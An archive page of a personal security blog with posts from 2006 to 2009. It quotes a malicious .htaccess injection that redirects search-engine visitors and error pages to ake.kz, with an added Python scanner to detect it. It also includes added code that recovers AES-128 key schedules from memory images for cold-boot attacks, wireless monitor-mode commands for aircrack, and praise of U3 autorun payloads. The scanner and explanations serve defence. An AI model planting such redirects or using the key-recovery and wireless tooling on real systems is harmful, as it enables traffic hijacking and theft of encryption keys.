Archive for the Category » Security «

Sunday, July 26th, 2009 | Author:

It’s been a while since my last entry. A few things were happening: my blog engine went kaput a few weeks ago, and it actually affected my Google ranking. 🙁 I saw a significant drop in search-engine-directed traffic.

Recently I discovered some malicious activity on my other web host. I was going through my gallery, http://jiehong.net/gallery, when after a few clicks I got redirected to ask.com. I thought I hadn’t renewed my subscription or my domain hosting.

After checking my subscriptions, all was fine. I went into cPanel to poke around. What can cause redirections? I checked the redirection settings, sub-domains, etc. Finally I discovered some redirecting code in some of my .htaccess files.

Sample:

ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]

I discovered a folder had been created in my public_html, “coming10/almost”. What’s “almost”, is the hacking almost done?
I found the following files inside:
– .htaccess
– doing83.html
– er404.php
– everyting40php
– thanks28.html

They all contain encoded JavaScript to redirect visitors to some site. MY VISITORS! I reported it to my web host; I wonder how much action they can take. They are using ClamAV to scan /home. Oh well… I’m expecting somebody to eyeball the logs to determine the source of entry.

Now I still do not know how they got in, so I need to monitor my site very closely.
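To turn the manual hunt through cPanel into something repeatable, here is an added example (mine, not code from the post, from cPanel or from the hoster) that scans an account’s .htaccess files for the two patterns the injected snippet above uses. First, ErrorDocument pointing at a full URL on a foreign host: Apache treats a URL argument as a redirect, so every 404 or 500 on the site bounces the visitor to the attacker. Second, a run of RewriteCond lines on %{HTTP_REFERER} naming search engines, followed by a RewriteRule whose target is a foreign host: that is referer cloaking, only visitors arriving from a search engine are redirected, so an owner who types the URL directly sees a healthy site. The jiehong.net domain in OWN_HOSTS is taken from the post; the keyword list, the function names and the two sample .htaccess bodies are my own constructions.

```python
import os
from urllib.parse import urlparse

# Hosts the site may legitimately redirect to.  jiehong.net is the gallery
# domain named in the post; anything you add here is site-specific.
OWN_HOSTS = {"jiehong.net", "www.jiehong.net"}

# Substrings that show up in the referer conditions of this injection.
# A heuristic (it would also match "task"), not a signature.
SEARCH_ENGINE_WORDS = ("google", "yahoo", "bing", "msn", "ask", "aol",
                       "altavista", "lycos", "search", "dogpile", "excite")


def external_host(target):
    """Return the hostname if target is an absolute http(s) URL to a host we
    do not own, else None.  Local paths such as /errors/404.html are fine."""
    u = urlparse(target)
    if u.scheme in ("http", "https") and u.hostname and u.hostname not in OWN_HOSTS:
        return u.hostname
    return None


def scan_htaccess(text):
    """Return [(line_number, message)] for the suspicious directives in one
    .htaccess body."""
    findings = []
    referer_conds = 0   # RewriteCond lines waiting for their RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "errordocument" and len(parts) >= 3:
            # Apache answers with a redirect when the argument is a full URL.
            host = external_host(parts[2])
            if host:
                findings.append((lineno, f"ErrorDocument {parts[1]} redirects errors to external host {host}"))
        elif directive == "rewritecond" and len(parts) >= 3:
            # Conditions apply only to the next RewriteRule.
            if parts[1].upper() == "%{HTTP_REFERER}" and any(
                    w in parts[2].lower() for w in SEARCH_ENGINE_WORDS):
                referer_conds += 1
        elif directive == "rewriterule" and len(parts) >= 3:
            host = external_host(parts[2])
            if host:
                msg = f"RewriteRule sends visitors to external host {host}"
                if referer_conds:
                    msg += f", gated on {referer_conds} search-engine referer checks (cloaking)"
                findings.append((lineno, msg))
            referer_conds = 0
    return findings


def scan_tree(root):
    """Walk a directory such as public_html and scan every .htaccess in it;
    returns {path: findings} for the files that had any."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_htaccess(fh.read())
            if hits:
                results[path] = hits
    return results


# Constructed inputs: a trimmed copy of the injected directives quoted in the
# post, and a benign file of the kind a CMS ships with.
INJECTED = """\
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]
"""

BENIGN = """\
ErrorDocument 404 /errors/404.html
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?q=$1 [L]
"""

if __name__ == "__main__":
    for name, body in (("injected", INJECTED), ("benign", BENIGN)):
        for lineno, msg in scan_htaccess(body):
            print(f"{name}:{lineno}: {msg}")
```

Run scan_tree("public_html") from a cron job and diff its output against the previous run; a new .htaccess in a directory you never created (like the “coming10/almost” one above) or a new external redirect target is the signal to look at. The scanner only catches this family of injection; it says nothing about how the attacker got write access, which the server logs still have to answer.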


Category: Security, Technical
Sunday, October 19th, 2008 | Author:

I just read this article on using compressed air to cool a memory chip so it will retain data even after power has been cut off.

A video can be found here on the process and on why a colder memory chip will retain data longer. By retaining the data, you can do a dump of the memory and extract the cryptographic keys. They were able to extract keys for BitLocker, TrueCrypt, FileVault and dm-crypt.

The attack does not exploit a weakness in the encryption software; it works because the keys have to be held in memory for as long as the encrypted volume is in use. Encrypting the key in memory doesn’t really help: you still need to store the key that encrypts it somewhere!
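As an added illustration (mine, not from the article or the video), the block below shows why a raw dump is enough: AES implementations keep the expanded key schedule in RAM while the volume is mounted (11 round keys, 176 bytes, for AES-128), and that schedule is self-consistent, so a scanner can recognise it in a memory image without knowing anything about the layout of the software that put it there. It assumes the schedule is stored contiguously in FIPS-197 order and that the dump is error-free; a real cold-boot image has decayed bits and the published tooling matches with error tolerance, which this example does not attempt. The memory image is constructed, with the FIPS-197 Appendix A test key planted at a known offset; the function names are mine.

```python
import random

RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def _gf_mul(a, b):
    """Multiply in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:
            a ^= 0x11B
        b >>= 1
    return r


def _gf_inv(x):
    """Multiplicative inverse as x^254 (0 maps to 0)."""
    r, p, e = 1, x, 254
    while e:
        if e & 1:
            r = _gf_mul(r, p)
        p = _gf_mul(p, p)
        e >>= 1
    return r if x else 0


def _affine(b):
    rot = lambda n: ((b << n) | (b >> (8 - n))) & 0xFF
    return b ^ rot(1) ^ rot(2) ^ rot(3) ^ rot(4) ^ 0x63


# The S-box derived from its definition rather than pasted as a table.
SBOX = [_affine(_gf_inv(x)) for x in range(256)]


def expand_key(key):
    """FIPS-197 key expansion for a 16-byte key: the 176-byte schedule."""
    words = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        t = list(words[i - 1])
        if i % 4 == 0:
            t = t[1:] + t[:1]                   # RotWord
            t = [SBOX[b] for b in t]            # SubWord
            t[0] ^= RCON[i // 4 - 1]            # Rcon
        words.append([words[i - 4][j] ^ t[j] for j in range(4)])
    return bytes(b for w in words for b in w)


def find_aes128_keys(image):
    """Return [(offset, key)] for each AES-128 key schedule in the image.

    Every 16-byte window is a candidate key.  A cheap check recomputes only
    the first derived word (w[4]) and compares it with the next four bytes;
    the full 176-byte expansion is done only for windows that pass, so a
    random window survives the cheap check with probability about 2^-32."""
    hits = []
    for off in range(len(image) - 176 + 1):
        k = image[off:off + 16]
        w4 = bytes([k[0] ^ SBOX[k[13]] ^ RCON[0],
                    k[1] ^ SBOX[k[14]],
                    k[2] ^ SBOX[k[15]],
                    k[3] ^ SBOX[k[12]]])
        if image[off + 16:off + 20] != w4:
            continue
        if image[off:off + 176] == expand_key(k):
            hits.append((off, bytes(k)))
    return hits


# Constructed "memory image": pseudo-random filler with one schedule planted
# at a known offset, standing in for the RAM of a machine with a mounted
# encrypted volume.  The key is the FIPS-197 Appendix A example key.
FIPS_KEY = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")
PLANT_OFFSET = 4096


def make_image(seed=7, size=16384):
    rng = random.Random(seed)
    buf = bytearray(rng.getrandbits(8) for _ in range(size))
    buf[PLANT_OFFSET:PLANT_OFFSET + 176] = expand_key(FIPS_KEY)
    return bytes(buf)


if __name__ == "__main__":
    for off, key in find_aes128_keys(make_image()):
        print(f"AES-128 key schedule at offset {off:#x}, key {key.hex()}")
```

Running it prints the planted key and its offset. Nothing in the scan depends on which disk-encryption product produced the schedule, which is the point of the post: wrapping the key in another key, or obfuscating where it lives, does not change the fact that the expanded schedule has to be in RAM while data is being decrypted.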

Category: Security, Systems
Sunday, October 05th, 2008 | Author:

My story on why I decided to change the phone lock timeout.

When I first powered on my HTC Touch Pro, I went through the start-up wizard; it prompted me to set a phone lock PIN and a timeout for activating the lock. I decided to go with 15 minutes, since I could change it later.

I decided to configure an Exchange profile on my Touch Pro for my office emails, since I have a Mobile Broadband plan with a 50GB data limit.

more…

Tuesday, September 30th, 2008 | Author:

Now, this is interesting for you iPhone folks. Check Point is providing an IPsec VPN client for the iPhone.

Link

Thursday, January 03rd, 2008 | Author:

If you installed Back Track 2 onto your hard disk and want to update the aircrack-ng suite, here are the commands to do so.

more…

Category: Linux, Security, Technical
Friday, December 28th, 2007 | Author:

I managed to get hold of a Linksys WUSB54GC USB wireless-g adapter and a burnt copy of Backtrack 2 with Aircrack-ng.

So let’s get started then. Back Track 2 is loaded with the rt73 drivers.

The following commands put your WUSB54GC dongle into monitor/injection mode.

“ifconfig rausb0 up”

“iwconfig rausb0 mode monitor channel 1 rate 1M”

“iwpriv rausb0 forceprism 1”

“iwpriv rausb0 rfmontx 1”

more…

Saturday, December 09th, 2006 | Author:

I got my Sandisk 2GB U3 drive at Sitex 2006 for SGD71. The threat from U3 drives is real; check the hacks available here: http://www.hak5.org/wiki/USB_Hacksaw

Forbes reported a recent news item about data related to U.S. underground nuclear weapon tests being leaked from Los Alamos Labs.

The threat of USB and other removable media is real, and enterprises should be looking into solutions to protect those endpoints.

Wednesday, October 18th, 2006 | Author:

Wow, I need to get a U3 thumbdrive!

A thumbdrive with 2 partitions, 1 of which emulates a CD/DVD-ROM device when plugged into your workstation.

Quoted from Wikipedia, “USB flash drives adhering to the U3 specification are termed “U3 smart drives” by U3.com. “U3 smart drives” differ from traditional USB flash drives because they come preinstalled with the U3 Launchpad, which emulates the Windows OS start menu, and controls program installation.”

Autorun? Payload? Malware? Endless ways to go right through your cleverly laid perimeter security. Because the emulated partition presents itself as a CD-ROM rather than removable storage, Windows of that era honours its autorun.inf and launches whatever it points to the moment the drive is plugged in, which is the hook the hacks linked below rely on.

http://www.hak5.org/wiki/USB_Hacksaw USB shall be seen as EVIL!

Category: Security, Technical
Friday, May 12th, 2006 | Author:

I have a problem which most of us are facing.

How many usernames and passwords are you keeping track of? Or even the email address that you used to create that account with? Admit it, most of us have more than 1 email address. 🙂
So how do you keep track of them? Save them into a spreadsheet? Are they secured? Most spreadsheets’ built-in protection is not good enough.

more…

Category: Security, Technical
Monday, April 24th, 2006 | Author:

Will companies use a system like an ISMS to ensure that they are meeting ISO17799 / BS7799 compliance for information security?

ISMS, in short, is an Information Security Management System: detailed documentation of controls, threats and vulnerabilities.

Any books to recommend, or sample document templates, for an aspiring Security Auditor? :p

Category: Security